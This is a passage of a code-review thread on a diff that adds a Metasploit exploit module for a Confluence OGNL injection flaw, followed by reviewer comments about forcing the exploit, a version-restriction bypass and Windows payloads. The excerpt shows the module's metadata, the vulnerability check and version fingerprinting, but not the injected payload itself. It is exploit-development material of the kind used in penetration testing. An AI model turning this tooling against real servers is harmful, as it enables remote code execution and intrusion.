modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb

```diff
@@ -0,0 +1,205 @@
+          ['CVE', '2021-26084'],
+          ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],
+          ['URL', 'https://github.com/jbaines-r7/through_the_wire'],
+          ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']
+        ],
+        'DisclosureDate' => '2022-06-02',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8090
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    version = get_confluence_version
+    return CheckCode::Unknown unless version
+
+    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
+    res = inject_ognl('', header: header) # empty command works for testing, the header will be set
+
+    return CheckCode::Unknown unless res
+
+    unless res && res.headers.include?(header)
+      # version 7.15 is technically vulnerable to the OGNL injection but not exploitable
+      return CheckCode::Detected("Detected Confluence version: #{version}") if version >= Rex::Version.new('7.15')
+
+      return CheckCode::Safe('Failed to test OGNL injection.')
+    end
+
+    vprint_status("Response header: #{res.headers[header]}")
+    CheckCode::Vulnerable('Successfully tested OGNL injection.')
+  end
+
+  def get_confluence_version
+    return @confluence_version if @confluence_version
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login.action')
+    )
+    return nil unless res&.code == 200
+
+    poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text
+    return nil unless poweredby =~ /Confluence (\d+(\.\d+)*)/
+
+    @confluence_version = Rex::Version.new(Regexp.last_match(1))
+    @confluence_version
+  end
+
+  def exploit
+    version = get_confluence_version
+    fail_with(Failure::Unknown, 'Failed to fingerprint the target server.') unless version
+    fail_with(Failure::NoTarget, "Confluence version #{version} is not exploitable.") if version >= Rex::Version.new('7.15')
```

Comment:
What if the user wants to `ForceExploit` ?

Reply:
The exploit still won't work on those versions, I tested it. The OGNL as it's currently written won't execute correctly. I need to look into a bypass for those restrictions, but in the meantime it'll work through 7.14.

Reply:
Add Windows payload too boy

Reply:
> The exploit still won't work on those versions, I tested it. The OGNL as it's currently written won't execute correctly. I need to look into a bypass for those restrictions, but in the meantime it'll work through 7.14.

Windows payload wont work